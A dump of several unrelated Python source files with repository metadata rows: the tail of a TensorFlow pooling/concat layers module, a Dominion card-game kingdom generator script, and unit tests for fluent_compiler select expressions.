        strides = np.asarray(self.strides[-3:-1] if self.data_format == "NHWC" else self.strides[-2:])
        kernels = np.asarray(self.ksize[-3:-1] if self.data_format == "NHWC" else self.ksize[-2:])
        # dtype=int: np.int was deprecated in NumPy 1.20 and removed in 1.24
        output_size = np.asarray(
            np.ceil(input_size / strides) if self.padding == "SAME" else np.ceil((input_size - (kernels - 1)) / strides), dtype=int)
        output_shape = self.incoming_shape[:]
        if self.data_format == "NHWC":
            output_shape[-3:-1] = output_size.tolist()
        else:
            output_shape[-2:] = output_size.tolist()
        return output_shape

    def get_output(self, prev_layers=None, **kwargs):
        """Calculate and return output of layer

        Parameters
        -------
        prev_layers : list of Layer or None
            List of layers that have already been processed (i.e. whose outputs have already been (re)computed and/or
            shall not be computed again)
        """
        if prev_layers is None:
            prev_layers = list()
        if self not in prev_layers:
            prev_layers += [self]
            incoming = self.incoming(prev_layers=prev_layers, **kwargs)
            with tf.variable_scope(self.layer_scope):
                self.out = avgpool2D(incoming, ksize=self.ksize, strides=self.strides, padding=self.padding,
                                     data_format=self.data_format)
        return self.out
class MaxPoolingLayer(Layer):
    def __init__(self, incoming, ksize=(1, 3, 3, 1), strides=(1, 1, 1, 1), padding='SAME', data_format='NHWC',
                 name='MaxPoolingLayer'):
        """Max pooling layer, capable of broadcasting over time series

        see tensorflow max pooling function for further details on parameters

        Parameters
        -------
        incoming : layer, tensorflow tensor, or placeholder
            input to layer
        ksize : tuple of int
            pooling window size per input dimension
        strides : tuple of int
            striding per input dimension
        padding : str
            "SAME" or "VALID" (see tensorflow pooling docs)
        data_format : str
            "NHWC" or "NCHW"
        name : str
            tensorflow variable-scope name
        """
        super(MaxPoolingLayer, self).__init__()
        with tf.variable_scope(name) as self.layer_scope:
            self.incoming, self.incoming_shape = get_input(incoming)
            self.ksize = ksize
            self.strides = strides
            self.padding = padding
            self.data_format = data_format
            self.out = None
            self.name = name

    def get_output_shape(self):
        """Return shape of output (spatial dims shrink per kernel/stride/padding;
        all other dims pass through unchanged)."""
        input_size = np.asarray(self.incoming_shape[-3:-1] if self.data_format == "NHWC" else self.incoming_shape[-2:])
        strides = np.asarray(self.strides[-3:-1] if self.data_format == "NHWC" else self.strides[-2:])
        kernels = np.asarray(self.ksize[-3:-1] if self.data_format == "NHWC" else self.ksize[-2:])
        # dtype=int: np.int was deprecated in NumPy 1.20 and removed in 1.24
        output_size = np.asarray(
            np.ceil(input_size / strides) if self.padding == "SAME" else np.ceil((input_size - (kernels - 1)) / strides), dtype=int)
        output_shape = self.incoming_shape[:]
        if self.data_format == "NHWC":
            output_shape[-3:-1] = output_size.tolist()
        else:
            output_shape[-2:] = output_size.tolist()
        return output_shape

    def get_output(self, prev_layers=None, **kwargs):
        """Calculate and return output of layer

        Parameters
        -------
        prev_layers : list of Layer or None
            List of layers that have already been processed (i.e. whose outputs have already been (re)computed and/or
            shall not be computed again)
        """
        if prev_layers is None:
            prev_layers = list()
        if self not in prev_layers:
            prev_layers += [self]
            incoming = self.incoming(prev_layers=prev_layers, **kwargs)
            with tf.variable_scope(self.layer_scope):
                self.out = maxpool2D(incoming, ksize=self.ksize, strides=self.strides, padding=self.padding,
                                     data_format=self.data_format)
        return self.out
class ConcatLayer(Layer):
    def __init__(self, incomings, a=tf.identity, name='ConcatLayer'):
        """Concatenate outputs of multiple layers at last dimension (e.g. for skip-connections)

        Parameters
        -------
        incomings : list of layers, tensorflow tensors, or placeholders
            List of incoming layers to be concatenated
        a : tensorflow function
            Activation function applied to the concatenated tensor
        """
        super(ConcatLayer, self).__init__()
        with tf.variable_scope(name) as self.layer_scope:
            self.incomings = []
            self.incoming_shapes = []
            # Resolve each incoming layer to its (tensor, shape) pair.
            for layer in incomings:
                tensor, shape = get_input(layer)
                self.incomings.append(tensor)
                self.incoming_shapes.append(shape)
            self.name = name
            self.a = a

    def get_output_shape(self):
        """Return shape of output"""
        # All dims match the first input except the last, which is the sum of
        # the inputs' last dims.
        base_shape = self.incoming_shapes[0]
        last_dim = sum(shape[-1] for shape in self.incoming_shapes)
        return base_shape[:-1] + [last_dim]

    def get_output(self, prev_layers=None, **kwargs):
        """Calculate and return output of layer

        Parameters
        -------
        prev_layers : list of Layer or None
            List of layers that have already been processed (i.e. whose outputs have already been (re)computed and/or
            shall not be computed again)
        """
        prev_layers = prev_layers if prev_layers is not None else list()
        if self not in prev_layers:
            prev_layers.append(self)
            outputs = [layer(prev_layers=prev_layers, **kwargs) for layer in self.incomings]
            with tf.variable_scope(self.layer_scope):
                concat_axis = len(self.incoming_shapes[0]) - 1
                self.out = self.a(tf.concat(axis=concat_axis, values=outputs))
        return self.out
| UTF-8 | Python | false | false | 34,148 | py | 127 | layers.py | 12 | 0.564706 | 0.556213 | 0 | 829 | 40.190591 | 135 |
zachoj10/kingdomgenerator | 7,670,811,621,204 | 3c998be86687e3213793479ff6e9e567055cf644 | 95a6304c63db86e7184f4fc976c63df6e2df7dd4 | /kingdomgenerator.py | 5082373181c4808ec3ef4dd74411837a24314618 | [] | no_license | https://github.com/zachoj10/kingdomgenerator | bc472c8b39c58163c49555686c982af82fadd9e2 | bbc46c9cdda52fbbcb11df819c6346a20627a735 | refs/heads/master | "2021-03-12T22:56:19.894438" | "2014-01-04T06:40:25" | "2014-01-04T06:40:25" | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #!/usr/bin/env python
# coding=utf-8
import csv, random, math
# Global state shared by the helper functions below.
cards = []  # every card row read from card_list.csv (plus an appended category)
selectedCards = []  # the kingdom currently on offer to the players
expansions = ['Dominion', 'Intrigue', 'Seaside', 'Alchemy', 'Prosperity', 'Cornucopia', 'Hinterlands', "Dark Ages", 'Guilds']
possibleCards = []  # pool of candidate cards from the chosen expansions
cardDispersion = []  # per-expansion percentages entered for mode 2
#Import Card List From CSV File
# NOTE(review): 'rb' mode with the csv module (and raw_input below) is the
# Python 2 idiom -- this script targets Python 2 despite print() calls.
with open('card_list.csv', 'rb') as csvfile:
    cardreader = csv.reader(csvfile, delimiter=',', quotechar='"')
    count = 0
    # Classify each card into exactly one category based on its columns.
    # NOTE(review): comparisons like row[3] >= '2' are lexicographic string
    # comparisons; they only behave numerically for single-digit values.
    for row in cardreader:
        if (row[3] >= '2' or row[3] == '?') and (row[4] >= '1' or row[4] == '?'):
            # Extra actions plus at least one card drawn.
            row.append('Village')
            count += 1
        elif row[4] >= '3':
            row.append('Terminal Action')
            count += 1
        elif (row[3] >= '1' or row[3] == '?') and (row[4] >='2' or row[4] == '?'):
            row.append('Lab')
            count += 1
        elif row[0] in ["Throne Room", "King's Court", "Procession"]:
            row.append('Duplicator')
            count += 1
        elif row[12] > '1' or row[12] == '?':
            row.append('Trasher')
            count += 1
        elif row[8] != '0':
            row.append('Attack')
            count += 1
        elif row[7] != '0':
            row.append('Victory')
            count += 1
        elif row[0].lower() in ["feast", "embargo", "island", "treasure map", "pillage"]:
            row.append('One-shot')
            # NOTE(review): only branch that does not increment count --
            # possibly unintentional; confirm before relying on count.
        else:
            row.append('None')
            count += 1
        cards.append(row)
print(count)
#Determine Categories for all cards
#Categories will be in position 19
#Get Number of Players
numPlayers = int(raw_input("Enter the number of players: "))
numCards = numPlayers + 10  # extra cards so each player can veto one later
#Get Deck Selections From User
selectedDecks = []
for i in range(len(expansions)):
    print(str(i)+ '. ' + expansions[i])
print('Please enter the numbers of the expanion packs you want to play with')
selection = raw_input()
selectedDeckNums = selection.split(',')
for i in range(len(selectedDeckNums)):
    selectedDecks.append(expansions[int(selectedDeckNums[i])])
def mergeSelection():
    """Flatten the chosen expansions into the global possibleCards pool.

    Appends every card whose expansion column (index 16) matches one of the
    player's selected decks, preserving deck order and, within a deck, the
    original card-list order.
    """
    possibleCards.extend(card
                         for deck in selectedDecks
                         for card in cards
                         if card[16] == deck)
#Display Card in Readable Manner
def displayCard(card):
    """Return a one-line, human-readable description of a card row.

    Only non-zero columns are shown; the expansion name is appended when more
    than one deck is in play, and the derived category (index 18) always is.
    """
    cardString = card[0] + ' (' + 'Cost: ' + card[2]
    if card[3] != '0':
        cardString += ', Actions: ' + card[3]
    if card[4] != '0':
        cardString += ', Cards: ' + card[4]
    if card[12] != '0':
        cardString += ', Trash: ' + card[12]
    if card[13] != '0':
        cardString += ', Coins: ' + card[13]
    if card[14] != '0':
        cardString += ', Buys: ' + card[14]
    cardString += ', Type: '
    if card[5] == '1':
        cardString += 'Action'
    elif card[6] == '1':
        cardString += 'Treasure'  # fixed user-facing typo: was 'Tresure'
    elif card[7] == '1':
        cardString += 'Victory'
    if card[8] == '1':
        cardString += ', Attack'
    if card[9] == '1':
        cardString += ', Reaction'
    if card[10] != '0':
        cardString += ', Duration: ' + card[10]
    if card[11] != '0':
        cardString += ', Victory Points: ' + card[11]
    if len(selectedDecks) > 1:
        cardString += ', Expansion: ' + card[16]
    cardString += ', Category: ' + card[18]
    cardString += ')'
    return cardString
#Print Selected Cards
def printkindgom():
    """Print the currently selected kingdom, one numbered card per line."""
    for index, card in enumerate(selectedCards):
        print(str(index) + '. ' + displayCard(card))
#Select 12 Random Cards and allow the user to reshuffle the deck
def selectRandom():
    """Offer random kingdoms of numCards cards until the user accepts one.

    Shuffles the global possibleCards pool and takes the first numCards
    entries; repeats while the user answers 'y' to the reshuffle prompt.
    """
    global selectedCards
    again = 'y'
    while again == 'y':
        random.shuffle(possibleCards)
        selectedCards = possibleCards[:numCards]
        printkindgom()
        again = raw_input('Would you like to reselect the kindgom? (y/n): ')
def saneKingdom():
    """Select a kingdom in which each special category appears at most once.

    Cards whose category (index 18) is 'None' may repeat; any other category
    is only allowed once per kingdom. Repeats while the user asks to reshuffle.

    Fixes vs. the previous version: the candidate pool is rebuilt instead of
    re-appended (mergeSelection() extends possibleCards, so calling it on a
    non-empty pool duplicated every card), and the used-category list is reset
    on every reshuffle instead of accumulating and draining the pool.
    """
    global selectedCards
    reshuffle = 'y'
    while reshuffle == 'y':
        # Rebuild the pool from scratch for every attempt.
        del possibleCards[:]
        mergeSelection()
        usedCateories = []  # reset per reshuffle (previously leaked across attempts)
        selectedCards = []
        numCardsSelected = 0
        random.shuffle(possibleCards)
        while numCards > numCardsSelected:
            card = possibleCards.pop(0)
            category = card[18]
            if category != 'None' and category in usedCateories:
                continue  # category already represented -> discard this card
            selectedCards.append(card)
            usedCateories.append(category)
            numCardsSelected += 1
        printkindgom()
        reshuffle = raw_input('Would you like to reselect the kindgom? (y/n): ')
#Select a specified number of cards from a specified deck
def selectSepcific(numToSelect, deck):
    """Append numToSelect random cards from the given expansion to selectedCards."""
    # Filter the master card list down to this expansion, then shuffle and
    # take the first numToSelect entries.
    pool = [card for card in cards if card[16] == deck]
    random.shuffle(pool)
    selectedCards.extend(pool[:numToSelect])
#Get Preferences for ratio of decks
print('How would you like the deck devived?\n1. Completely random from all selected decks.\n2. Certain Percentage from each selected deck.\n3. Generate a sane kingdom')
var = raw_input('Enter selction: ')
if var == '1':
    # Mode 1: pool all chosen expansions and draw uniformly at random.
    mergeSelection()
    selectRandom()
elif var == '2':
    # Mode 2: the user allocates a percentage of the kingdom to each deck;
    # the final deck implicitly receives whatever percentage remains.
    reshuffle = 'y'
    while reshuffle == 'y':
        cardDispersion = []
        # NOTE(review): 'global' at module scope is a no-op; harmless.
        global selectedCards
        selectedCards = []
        percentageAllocated = 0
        for i in range(len(selectedDecks) - 1):
            cardDispersion.append(int(raw_input('Enter the pergentage to be taken from the ' + selectedDecks[i] + ' deck: ')))
            percentageAllocated += cardDispersion[-1]
        cardDispersion.append(100 - percentageAllocated)
        numSelected = 0
        print(len(cardDispersion))
        for i in range(len(cardDispersion) - 1):
            # NOTE(review): under Python 2 this is integer division, so each
            # deck's share rounds down; the last deck absorbs the remainder.
            numToSelect = (int(cardDispersion[i]) * numCards)/100
            selectSepcific(numToSelect, selectedDecks[i])
            numSelected += numToSelect
        selectSepcific(numCards - numSelected, selectedDecks[-1])
        printkindgom()
        reshuffle = raw_input('Would you like to reselect the kindgom? (y/n): ')
elif var == '3':
    saneKingdom()
#Allow veto until they get down to 10 cards
# Players take turns vetoing cards until only the final 10 remain.
while len(selectedCards) > 10:
    printkindgom()
    veto = raw_input("Enter the number of the card that you would like to veto: ")
    del selectedCards[int(veto)]
print("\nYour Final Kingdom is:")
printkindgom()
| UTF-8 | Python | false | false | 6,435 | py | 2 | kingdomgenerator.py | 1 | 0.581428 | 0.561363 | 0 | 199 | 31.251256 | 168 |
django-ftl/fluent-compiler | 15,135,464,774,970 | c93d17453236284d485d1298c454ad4a897a4cb3 | d755aaaf905b48baf31aa90332f03c45f4c8dad3 | /tests/format/test_select_expression.py | 2fcb4a4fd1b32291b57d125b204a148ddbb417f7 | [
"Apache-2.0"
] | permissive | https://github.com/django-ftl/fluent-compiler | 36ffe0c76678e82f4f15bbccef057c8e4cd0e6bc | d8f19b47161788fbdea9822b130ef136fb839540 | refs/heads/master | "2023-08-08T04:16:52.368218" | "2023-07-21T10:37:17" | "2023-07-21T10:37:17" | 248,319,322 | 20 | 1 | NOASSERTION | false | "2023-04-18T16:14:05" | "2020-03-18T19:04:42" | "2023-03-04T02:49:47" | "2023-04-18T16:14:01" | 850 | 14 | 2 | 3 | Python | false | false | import unittest
from fluent_compiler.bundle import FluentBundle
from fluent_compiler.errors import FluentReferenceError
from ..utils import dedent_ftl
class TestSelectExpressionWithStrings(unittest.TestCase):
    """Select expressions keyed on string literals and string arguments."""

    def test_with_a_matching_selector(self):
        # The selector "a" matches the [a] variant exactly.
        fluent_bundle = FluentBundle.from_string(
            "en-US",
            dedent_ftl(
                """
                foo = { "a" ->
                    [a] A
                   *[b] B
                 }
            """
            ),
        )
        result, errors = fluent_bundle.format("foo", {})
        self.assertEqual(result, "A")
        self.assertEqual(errors, [])

    def test_with_a_non_matching_selector(self):
        # "c" matches nothing, so the default (*) variant is used.
        fluent_bundle = FluentBundle.from_string(
            "en-US",
            dedent_ftl(
                """
                foo = { "c" ->
                    [a] A
                   *[b] B
                 }
            """
            ),
        )
        result, errors = fluent_bundle.format("foo", {})
        self.assertEqual(result, "B")
        self.assertEqual(errors, [])

    def test_with_a_missing_selector(self):
        # An unknown external variable falls back to the default variant and
        # reports a reference error at the selector's position.
        fluent_bundle = FluentBundle.from_string(
            "en-US",
            dedent_ftl(
                """
                foo = { $none ->
                    [a] A
                   *[b] B
                 }
            """
            ),
        )
        result, errors = fluent_bundle.format("foo", {})
        self.assertEqual(result, "B")
        self.assertEqual(errors, [FluentReferenceError("<string>:2:9: Unknown external: none")])

    def test_with_argument_expression(self):
        # A supplied string argument is matched against the variant keys.
        fluent_bundle = FluentBundle.from_string(
            "en-US",
            dedent_ftl(
                """
                foo = { $arg ->
                    [a] A
                   *[b] B
                 }
            """
            ),
        )
        result, errors = fluent_bundle.format("foo", {"arg": "a"})
        self.assertEqual(result, "A")

    def test_string_selector_with_plural_categories(self):
        fluent_bundle = FluentBundle.from_string(
            "en-US",
            dedent_ftl(
                """
                foo = { $arg ->
                    [something] A
                   *[other] B
                 }
            """
            ),
        )
        # Even though 'other' matches a CLDR plural, this is not a plural
        # category match, and should work without errors when we pass
        # a string.
        result, errors = fluent_bundle.format("foo", {"arg": "something"})
        self.assertEqual(result, "A")
        self.assertEqual(errors, [])
        result_other, errors_other = fluent_bundle.format("foo", {"arg": "other"})
        self.assertEqual(result_other, "B")
        self.assertEqual(errors_other, [])
        result_fallback, errors_fallback = fluent_bundle.format("foo", {"arg": "not listed"})
        self.assertEqual(result_fallback, "B")
        self.assertEqual(errors_fallback, [])
class TestSelectExpressionWithNumbers(unittest.TestCase):
    """Number literals and numeric arguments used as select-expression keys."""
    def setUp(self):
        # One bundle shared by all tests: 'foo'/'bar'/'qux' use literal
        # selectors, 'baz' selects on the external variable $num.
        self.bundle = FluentBundle.from_string(
            "en-US",
            dedent_ftl(
                """
                foo = { 1 ->
                   *[0] A
                    [1] B
                 }
                bar = { 2 ->
                   *[0] A
                    [1] B
                 }
                baz = { $num ->
                   *[0] A
                    [1] B
                 }
                qux = { 1.0 ->
                   *[0] A
                    [1] B
                 }
            """
            ),
            use_isolating=False,
        )
    def test_selects_the_right_variant(self):
        # Literal 1 matches the [1] variant exactly.
        val, errs = self.bundle.format("foo", {})
        self.assertEqual(val, "B")
        self.assertEqual(errs, [])
    def test_with_a_non_matching_selector(self):
        # Literal 2 matches nothing -> default variant.
        val, errs = self.bundle.format("bar", {})
        self.assertEqual(val, "A")
        self.assertEqual(errs, [])
    def test_with_a_missing_selector(self):
        # Missing $num -> default variant plus a reference error.
        val, errs = self.bundle.format("baz", {})
        self.assertEqual(val, "A")
        self.assertEqual(errs, [FluentReferenceError("<string>:12:9: Unknown external: num")])
    def test_with_argument_int(self):
        val, errs = self.bundle.format("baz", {"num": 1})
        self.assertEqual(val, "B")
    def test_with_argument_float(self):
        # 1.0 compares equal to the [1] variant key.
        val, errs = self.bundle.format("baz", {"num": 1.0})
        self.assertEqual(val, "B")
    def test_with_float(self):
        # Float literal selector 1.0 also matches [1].
        val, errs = self.bundle.format("qux", {})
        self.assertEqual(val, "B")
class TestSelectExpressionWithPlaceables(unittest.TestCase):
    """Placeables ($arg) inside variants of a select expression."""
    def test_external_arguments_in_variants(self):
        # We are testing several things:
        # - that [b] variant doesn't trigger 'Unknown external: arg'
        # - some logic in compiler implementation regarding when variables are looked up,
        # so that [a] and [c] variants both can find 'arg'.
        bundle = FluentBundle.from_string(
            "en-US",
            dedent_ftl(
                """
                foo = { $lookup ->
                    [a] { $arg }
                    [b] B
                   *[c] { $arg }
                 }
            """
            ),
        )
        # No args: both $lookup and the $arg in the default [c] branch are
        # reported; the placeable falls back to the variable name.
        val1, errs1 = bundle.format("foo", {})
        self.assertEqual(val1, "arg")
        self.assertEqual(
            errs1,
            [
                FluentReferenceError("<string>:2:9: Unknown external: lookup"),
                FluentReferenceError("<string>:5:15: Unknown external: arg"),
            ],
        )
        # [a] branch, arg supplied
        val2, errs2 = bundle.format("foo", {"lookup": "a", "arg": "A"})
        self.assertEqual(val2, "A")
        self.assertEqual(errs2, [])
        # [a] branch, arg not supplied
        val3, errs3 = bundle.format("foo", {"lookup": "a"})
        self.assertEqual(val3, "arg")
        self.assertEqual(errs3, [FluentReferenceError("<string>:3:15: Unknown external: arg")])
        # [b] branch
        val4, errs4 = bundle.format("foo", {"lookup": "b"})
        self.assertEqual(val4, "B")
        self.assertEqual(errs4, [])
        # [c] branch, arg supplied
        val5, errs5 = bundle.format("foo", {"lookup": "c", "arg": "C"})
        self.assertEqual(val5, "C")
        self.assertEqual(errs5, [])
        # [c] branch, arg not supplied
        val6, errs6 = bundle.format("foo", {"lookup": "c"})
        self.assertEqual(val6, "arg")
        self.assertEqual(errs6, [FluentReferenceError("<string>:5:15: Unknown external: arg")])
class TestSelectExpressionWithPluralCategories(unittest.TestCase):
    """CLDR plural-category matching ('one'/'other') vs. exact-number keys."""
    def setUp(self):
        # '-arg' messages select on the external $count; the others use
        # literal selectors. 'bar*' use an exact [1] key instead of [one].
        self.bundle = FluentBundle.from_string(
            "en-US",
            dedent_ftl(
                """
                foo = { 1 ->
                    [one] A
                   *[other] B
                 }
                foo-arg = { $count ->
                    [one] A
                   *[other] B
                 }
                bar = { 1 ->
                    [1] A
                   *[other] B
                 }
                bar-arg = { $count ->
                    [1] A
                   *[other] B
                 }
                baz = { "not a number" ->
                    [one] A
                   *[other] B
                 }
                baz-arg = { $count ->
                    [one] A
                   *[other] B
                 }
                qux = { 1.0 ->
                    [1] A
                   *[other] B
                 }
            """
            ),
            use_isolating=False,
        )
    def test_selects_the_right_category_with_integer_static(self):
        # Literal 1 falls into the 'one' plural category.
        val, errs = self.bundle.format("foo", {})
        self.assertEqual(val, "A")
        self.assertEqual(errs, [])
    def test_selects_the_right_category_with_integer_runtime(self):
        # Runtime 1 -> 'one'; runtime 2 -> 'other'.
        val, errs = self.bundle.format("foo-arg", {"count": 1})
        self.assertEqual(val, "A")
        self.assertEqual(errs, [])
        val, errs = self.bundle.format("foo-arg", {"count": 2})
        self.assertEqual(val, "B")
        self.assertEqual(errs, [])
    def test_selects_the_right_category_with_float_static(self):
        # 1.0 matches the exact [1] key in 'qux'.
        val, errs = self.bundle.format("qux", {})
        self.assertEqual(val, "A")
        self.assertEqual(errs, [])
    def test_selects_the_right_category_with_float_runtime(self):
        # Float 1.0 still maps to the 'one' category.
        val, errs = self.bundle.format("foo-arg", {"count": 1.0})
        self.assertEqual(val, "A")
        self.assertEqual(errs, [])
    def test_selects_exact_match_static(self):
        # Exact numeric key [1] wins for the literal selector.
        val, errs = self.bundle.format("bar", {})
        self.assertEqual(val, "A")
        self.assertEqual(errs, [])
    def test_selects_exact_match_runtime(self):
        val, errs = self.bundle.format("bar-arg", {"count": 1})
        self.assertEqual(val, "A")
        self.assertEqual(errs, [])
    def test_selects_default_with_invalid_selector_static(self):
        # A string selector never matches a plural category -> default.
        val, errs = self.bundle.format("baz", {})
        self.assertEqual(val, "B")
        self.assertEqual(errs, [])
    def test_selects_default_with_invalid_selector_runtime(self):
        val, errs = self.bundle.format("baz-arg", {"count": "not a number"})
        self.assertEqual(val, "B")
        self.assertEqual(errs, [])
    def test_with_a_missing_selector(self):
        # Missing $count -> default variant plus a reference error.
        val, errs = self.bundle.format("foo-arg", {})
        self.assertEqual(val, "B")
        self.assertEqual(errs, [FluentReferenceError("<string>:7:13: Unknown external: count")])
class TestSelectExpressionWithTerms(unittest.TestCase):
    """Term attributes used as select-expression selectors."""

    def setUp(self):
        # One term with an attribute, referenced from three selectors that
        # exercise match, fallback, and missing-attribute behaviour.
        self.bundle = FluentBundle.from_string(
            "en-US",
            dedent_ftl(
                """
                -my-term = term
                    .attr = termattribute
                ref-term-attr = { -my-term.attr ->
                        [termattribute] Term Attribute
                       *[other] Other
                 }
                ref-term-attr-other = { -my-term.attr ->
                        [x] Term Attribute
                       *[other] Other
                 }
                ref-term-attr-missing = { -my-term.missing ->
                        [x] Term Attribute
                       *[other] Other
                 }
            """
            ),
            use_isolating=False,
        )

    def test_ref_term_attr(self):
        # The attribute value matches the [termattribute] variant.
        result, errors = self.bundle.format("ref-term-attr")
        self.assertEqual(result, "Term Attribute")
        self.assertEqual(errors, [])

    def test_ref_term_attr_fallback(self):
        # No variant matches the attribute value -> default variant.
        result, errors = self.bundle.format("ref-term-attr-other")
        self.assertEqual(result, "Other")
        self.assertEqual(errors, [])

    def test_ref_term_attr_missing(self):
        # A missing term attribute selects the default variant and reports
        # exactly one reference error.
        result, errors = self.bundle.format("ref-term-attr-missing")
        self.assertEqual(result, "Other")
        self.assertEqual(len(errors), 1)
        self.assertEqual(
            errors,
            [FluentReferenceError("<string>:15:27: Unknown attribute: -my-term.missing")],
        )
| UTF-8 | Python | false | false | 10,567 | py | 52 | test_select_expression.py | 27 | 0.484243 | 0.476389 | 0 | 356 | 28.682584 | 96 |
liu1355/dl_fin | 12,635,793,796,241 | bc31876bec4a1f84a877f225375264a83ad938b1 | b3ab292901144ba5b3256116e314fb9d6b776252 | /DDQN/FRED/a23.py | dcfb46b76cd5d6b794da660389a0fe56da2e13f0 | [
"MIT"
] | permissive | https://github.com/liu1355/dl_fin | 10e6b6fb8624e97894f37928b25ebebb144780cf | 9a4be858127be0daa96cc8bb5cfed9d14f7912b8 | refs/heads/master | "2021-05-06T06:00:03.196560" | "2017-12-31T08:53:58" | "2017-12-31T08:53:58" | 115,273,497 | 0 | 1 | null | null | null | null | null | null | null | null | null | null | null | null | null | import csv
import requests
import pandas as pd

# Quandl CSV endpoint for the FRED NROUST series (API key embedded upstream).
FRED_NROUST = 'https://www.quandl.com/api/v3/datasets/FRED/NROUST/data.csv?api_key=6CbgFEPrywyyFy1yNywC'

# Download the series and parse the CSV payload into a list of rows.
with requests.Session() as session:
    response = session.get(FRED_NROUST)
    payload = response.content.decode('utf-8')
    reader = csv.reader(payload.splitlines(), delimiter=',')
    NROUST_list = list(reader)
    # Echo every row (header included) to stdout, as before.
    for row in NROUST_list:
        print(row)

# Persist the raw rows; note the CSV header row becomes an ordinary data row.
NROUST_list = pd.DataFrame(NROUST_list)
NROUST_list.to_csv('a23.csv', encoding='utf-8')
| UTF-8 | Python | false | false | 507 | py | 32 | a23.py | 31 | 0.700197 | 0.686391 | 0 | 18 | 27.166667 | 104 |
rambokiller/PythonProgramming | 5,669,356,880,980 | 780beae5d7958c86af8ecae002031b4e71a3a011 | b61849c7d7ff5505c0c895fe92b4740d6dd63add | /futval.py | 00cf65c67a2e96e9254b2e7d10e0ec022191ab2d | [] | no_license | https://github.com/rambokiller/PythonProgramming | c3ca2ec209f404527f509e8113c6904c58e2e23e | 26fd562aba10769a43ba09a9cf0b28b8200a6e1a | refs/heads/master | "2021-01-10T05:38:34.410666" | "2016-02-20T04:43:23" | "2016-02-20T04:43:23" | 52,028,135 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #!/usr/bin/env python3
# A program to compute the value of an investment carried
# 10 years into the future
def main():
    """Prompt for a principal and annual interest rate, then print the
    investment's value after 10 years of annual compounding."""
    print("This program calculates the future value", end=" ")
    # Fixed inconsistency: the prompt said "20-year" but the loop below (and
    # the header comment) compound for 10 years.
    print("of a 10-year investment.")
    # NOTE(review): eval() on raw user input executes arbitrary code; float()
    # would be the safe replacement, kept as-is to preserve accepted inputs.
    principal = eval(input("Enter the initial principal: "))
    apr = eval(input("Enter the annual interest rate: "))/100
    for i in range(10):
        principal = principal * (1 + apr)
    print("The value in 10 years is:", principal)

main()
| UTF-8 | Python | false | false | 451 | py | 8 | futval.py | 8 | 0.689579 | 0.660754 | 0 | 17 | 25.529412 | 59 |
zdf0221/wireless | 19,396,072,330,161 | 50a24a990a996f2ff63b44bd771f24be24b3fa13 | 73f965c69c001044e8d1ad9d40b12b1a4c87409c | /managesys/migrations/0008_account.py | da5651d6b034ca3c3af2f0cb4d24918d716ae7da | [] | no_license | https://github.com/zdf0221/wireless | 6175104dac356b784fec3bef582b17e29c961b17 | d1c801854b1c3bd033e67f5e6461f77816e57fef | refs/heads/master | "2021-01-10T23:45:35.088530" | "2016-10-09T15:38:08" | "2016-10-09T15:38:08" | 70,407,267 | 3 | 0 | null | false | "2016-10-09T15:38:10" | "2016-10-09T14:10:11" | "2016-10-09T14:14:31" | "2016-10-09T15:38:09" | 2,407 | 0 | 0 | 0 | Python | null | null | # -*- coding: utf-8 -*-
# Generated by Django 1.10 on 2016-09-27 09:38
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    # Re-creates the 'account' model that was dropped by migration 0007.
    dependencies = [
        ('managesys', '0007_delete_account'),
    ]
    operations = [
        migrations.CreateModel(
            name='account',
            fields=[
                # The 15-character account number doubles as the primary key,
                # so Django adds no automatic 'id' pk for this model.
                ('accountNumber', models.CharField(max_length=15, primary_key=True, serialize=False)),
                ('accountType', models.CharField(max_length=50)),
                ('accountFee', models.CharField(max_length=50)),
                ('username', models.CharField(max_length=20)),
                # NOTE(review): a plain CharField named 'id' -- not a key here.
                ('id', models.CharField(max_length=20)),
                # NOTE(review): max_length is ignored by FloatField (it is a
                # CharField option); harmless, but confirm the intended type.
                ('balance', models.FloatField(max_length=20)),
                ('status', models.CharField(max_length=20)),
            ],
        ),
    ]
| UTF-8 | Python | false | false | 879 | py | 37 | 0008_account.py | 29 | 0.564278 | 0.525597 | 0 | 27 | 31.555556 | 102 |
rajunrosco/PythonExperiments | 15,144,054,707,093 | f6c5c8492012bf4f5e60ffee0fdd266dbb6d338c | 90b03c0a5ce3088ea704ced246112530a2a5cfb0 | /OneDriveTEST/OneDrive.py | 2631a89e693146e6a34657a78dba1aa25e12a1fc | [] | no_license | https://github.com/rajunrosco/PythonExperiments | f567aceb287489dd5ba98a5d633d75a19b7d6726 | 702f1b0515708021d9170eff7cb199b43df53dd6 | refs/heads/master | "2023-01-12T09:48:04.140653" | "2022-02-05T06:47:02" | "2022-02-05T06:47:02" | 141,531,586 | 0 | 0 | null | false | "2022-12-27T15:34:53" | "2018-07-19T06:04:45" | "2022-02-05T06:47:07" | "2022-12-27T15:34:51" | 7,378 | 0 | 0 | 7 | Python | false | false | import base64
def create_onedrive_directdownload(onedrive_link):
    """Convert a OneDrive sharing URL into a direct-download API URL.

    Builds the u!-token: URL-safe base64 of the share link (i.e. '+'->'-',
    '/'->'_') with trailing '=' padding stripped.
    """
    token = base64.urlsafe_b64encode(onedrive_link.encode('utf-8')).decode('utf-8').rstrip("=")
    return f"https://api.onedrive.com/v1.0/shares/u!{token}/root/content"
import pandas as pd
# Input any OneDrive URL
onedrive_url = "https://1drv.ms/x/s!AhnXJ-3UjJ5NgQzUCY5Hzbb8m8-j?e=SYKklv"
# Convert the share link into a direct-download URL and fetch the workbook.
direct_download_url = create_onedrive_directdownload(onedrive_url)
print(direct_download_url)# Load Dataset to the Dataframe
df = pd.read_excel(direct_download_url)
# NOTE(review): 'istop' appears unused -- possibly a leftover debug marker.
istop =1
print(df.head())# Continue with your data analysis ... | UTF-8 | Python | false | false | 709 | py | 57 | OneDrive.py | 35 | 0.722144 | 0.686883 | 0 | 16 | 43.375 | 100 |
bartoszp32/arttest | 3,745,211,489,657 | 81d4452d6afac1f706fe81afac23091b3ad7bede | 65226f6ed8c2fb16188d7523e37b6b5d4027ddb8 | /arttest/logic/calendars.py | bf400ce266376ce82031ba74b62e51431258eb50 | [] | no_license | https://github.com/bartoszp32/arttest | a1eda9972bc82cda9ca500c64375ee3bb0b10444 | c029263bb4e6c691d0752df482cfeef104ab4940 | refs/heads/master | "2019-07-08T12:20:25.441470" | "2017-06-19T05:48:44" | "2017-06-19T05:48:44" | 88,907,729 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #-*- coding: utf-8 -*-
